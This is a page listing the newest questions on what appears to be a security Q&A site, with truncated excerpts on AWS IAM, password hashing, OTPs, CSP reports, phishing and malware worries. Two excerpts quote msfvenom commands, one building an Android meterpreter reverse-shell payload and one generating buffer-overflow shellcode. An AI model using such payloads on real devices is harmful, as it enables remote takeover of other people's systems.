Newest Questions

Ask Question
70,166 questions
Newest Active Bountied Unanswered
0 votes
0 answers
42 views

is it possible to insert hidden code using utf8 or utf16 that rearranges a sequence of executable ascii letters (first a utf16 character that rearranges the letters off-screen could be interpreted as ...
loud_flash's user avatar
  • 1
0 votes
0 answers
25 views

To securely access AWS Services, I get it that you should always use IAM Roles, such that the credential exposure is always only temporary. What I do not fully understand is, how do you actually ...
DevelJoe's user avatar
  • 161
1 vote
0 answers
28 views

I have a Samsung S24 and I tried to install msfvenom from Kali Linux, but I always get an error. msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.66 LPORT=555 --platform android -a dalvik -...
Eray Halidov's user avatar
  • 11
0 votes
1 answer
45 views

I use msfvenom generated shellcode in buffer overflow. Here's command that i used to create shellcode for linux x64: msfvenom -p linux/x64/exec -f py -o shellcode.py -b '\x00' CMD=whoami and here's ...
CyberCr0w's user avatar
  • 1
0 votes
1 answer
40 views

I have recently added CSP headers to a rather complex web application, being -report-only at first. I got some noise from browser extensions in the report, but two incidents caught my eye especially: ...
cis's user avatar
  • 417
1 vote
0 answers
30 views

I think that my SIM card has malware and I want to transfer it to my other phone. Would the malware transfer also? I saw that it can attack during a phone update download. If the update has downloaded ...
Master Baiter's user avatar
  • 11
1 vote
0 answers
71 views

I've got a service currently using PBKDF2-HMAC-SHA256 for password hashing, and I thought I'd upgrade that to something a wee bit more GPU-resistant, so I've been checking out my options, comparing ...
Dolda2000's user avatar
  • 305
1 vote
0 answers
77 views

Until now, I have been using VPN client on my computer. I did this to hide the fact that I was using Tor, as well as other activities, from my ISP. I would like to change my configuration. I want to ...
zbroqvfuktscvn's user avatar
  • 11
0 votes
0 answers
57 views

Wikipedia's CAs are Let's Encrypt, DigiCert and GlobalSign. But my browser shows a certificate issued by... Google? (See the screenshot) What can this possibly mean? I know there are some similar ...
user avatar
0 votes
0 answers
13 views

I was upgrading my development setup, and I found this path in my PATH variable: /opt/pmk/env/global/bin, and it's added by /etc/paths.d/10-pmk-global. Usually, a system-related program would go in /...
DannyNiu's user avatar
  • 402
0 votes
0 answers
24 views

I want to know how much secure is the package lm-sensors. I need to monitor the temperature of my machine to adapt the configuration of the fans. The programm prompt me for my root password to access ...
Yoh's user avatar
  • 101
0 votes
0 answers
26 views

i wanna your advice for cyberSecurity career i've been 3 years experience as fullstack developer and i thing i gave some love to all things realated with DevOps and linux an cyberSecurity , so i ...
php_learn's user avatar
  • 1
0 votes
0 answers
24 views

I tried to search the web on existing projects, but after failed attempts, I decided to code something on my own way, one approach, open to comments and improvements: #!/usr/bin/env python3 import ...
Gilles Quénot's user avatar
  • 101
0 votes
0 answers
34 views

This morning, I was reading an article on a popular local news site on my Android phone. After being on the page for about a minute, the fingerprint prompt showed up on my screen. The text said it was ...
Towrope's user avatar
  • 101
0 votes
1 answer
91 views

I've been provisionally using C#'s System.Web.Helpers.Crypto.HashPassword() and .VerifyHashedPassword() in an (in-development) accounting/finance web app. Before the app's published, I'd like to ...
In Hoc Signo's user avatar
  • 109
0 votes
0 answers
20 views

I discovered ExtAnalysis, tried to run it in a Docker container, but this seems that this project is abandoned. There's too many errors. Some issues are opened since 2023 in the repository. So my ...
Gilles Quénot's user avatar
  • 101
-1 votes
0 answers
48 views

During the change of clock due to the daylight saving time, almost all banks stop all money transactions at least from 1 hour before to 1 hour ahead of the time of change if the clock. Why do they ...
Space.yg's user avatar
  • 1
0 votes
0 answers
18 views

I am doing a security exercise where I need to use a wordfile and scan a server for endpoints to find a secret. The secret is on a file called .env (I found it in a different way), but I wonder why ...
Μenelaοs's user avatar
  • 101
0 votes
1 answer
200 views

I would like to be able to store backups on potentially "untrustworthy" sources such as cloud storage. Whilst I could probably get away with a simple encrypted tar file, for a single backup, ...
Sam Coutteau's user avatar
  • 113
5 votes
1 answer
812 views

I noticed that with Linux pam-u2f module whether you are required to input your PIN can be changed by simply editing ~/.config/Yubico/u2f_keys file and either adding +pin to your configuration line or ...
ojs's user avatar
  • 153
6 votes
1 answer
612 views

Apple claims that one time token is created. What is the purpose of that token? What happens with that token? As far as I know when I pay with my physical debit card the information passed the POS ...
ilhan's user avatar
  • 475
0 votes
1 answer
40 views

My company has a small call center. Less than 100 people. Currently we do not do any credit card transactions but are looking to do so in the future. One potential client has us using their ...
Magellan Jim's user avatar
  • 1
7 votes
3 answers
2k views

I use SMS for MFA (yes I know it's bad, but better than no MFA) in an web application. On login an OTP is sent to the user via SMS. This OTP is valid until: it expires after 10 minutes it is ...
Martin's user avatar
  • 173
0 votes
0 answers
21 views

How does Defender for Cloud interpret and normalize these logs? In the Defender console, I see an inbound connection on a DMZ host (acting as an FTP server using vShell), showing Tor IP → internal IP. ...
Sabari A's user avatar
  • 1
0 votes
1 answer
62 views

When you interact with QSCD on a token do you need the middleware to be issued by a Trusted Service Provider (TSP), or is middleware just a utility which I can reimplement on another platform? Does ...
Desperado's user avatar
  • 101
1 vote
0 answers
46 views

I have an application, myapplication.exe. Through IFEO registry I can attach a debugger, which can be a malicious piece of software for a attacker. Only someone having access to Windows registry can ...
Jyothish Bhaskaran's user avatar
  • 111
0 votes
0 answers
56 views

A user accidentally clicked a link in a phishing email. The link led to what appeared to be an online video-course/tutorial site. The user did not enter any credentials, download any files, or ...
maruf's user avatar
  • 101
0 votes
1 answer
97 views

In php I am generating a unique random token used as a code and Index for password resets: declare(strict_types=1); namespace App\Domain\Helper; use Ramsey\Uuid\Uuid; use Random\RandomException; ...
Dimitrios Desyllas's user avatar
  • 399
0 votes
0 answers
4 views

Is there any method to forensically analyse Android mobile memory without rooting the phone. I want to capture malware in my Android phone.
Reza Haider's user avatar
  • 1
0 votes
3 answers
98 views

I am using the following approach for time limited OTP used in my php app using a pseudorandom generator: $otp=str_pad((string)random_int(0, 9999), 4, '0', STR_PAD_LEFT); Then upon the User I store:...
Dimitrios Desyllas's user avatar
  • 399

15 30 50 per page
1
2 3 4 5
2339